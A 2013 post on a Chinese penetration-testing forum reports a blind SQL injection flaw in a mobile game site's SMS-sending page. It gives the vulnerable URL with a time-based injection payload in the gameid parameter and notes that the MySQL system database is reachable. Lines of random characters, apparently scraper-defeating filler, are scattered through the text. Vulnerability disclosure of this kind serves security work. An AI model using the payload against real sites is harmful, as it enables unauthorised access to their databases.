中国网络渗透测试联盟
标题:
凤凰手机游戏网SQL盲注漏洞
[打印本页]
作者:
admin
时间:
2013-4-4 17:34
标题:
凤凰手机游戏网SQL盲注漏洞
简要描述:
$ I, z8 Q9 [& G; s; r8 o+ I; A. w2 `- Z
凤凰手机游戏网,在填写手机号码发送push连接的地方存在sql盲注漏洞。
' ~& i3 T0 I3 N) S/ G
/ v1 W% {, P* S/ W( u* s+ `/ l& ?
详细说明:
3 K& Y: b* w* e
存在SQL盲注url:
6 n# J+ B6 n, X% `: v' s) }
fenghuang/game/game_send_sms.jsp?gameid=130221346000%27%20and%20sleep%282%29%3d%27&mo=1
4 A; l E5 I4 t6 u3 ~% D
http://www.myhack58.com/Article/UploadPic/2013-4/2013411254849748.png
/ P" ~: l3 Y2 J/ I
http://www.myhack58.com/Article/UploadPic/2013-4/20134112545369314.png
5 v+ ]/ y! f" l$ j
http://www.myhack58.com/Article/UploadPic/2013-4/20134112565766695.jpg
% H4 |6 G/ K6 t* Z2 ]
w3 l2 c6 c( _
能看到mysql系统数据库,看来user权限应该很高的。。
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2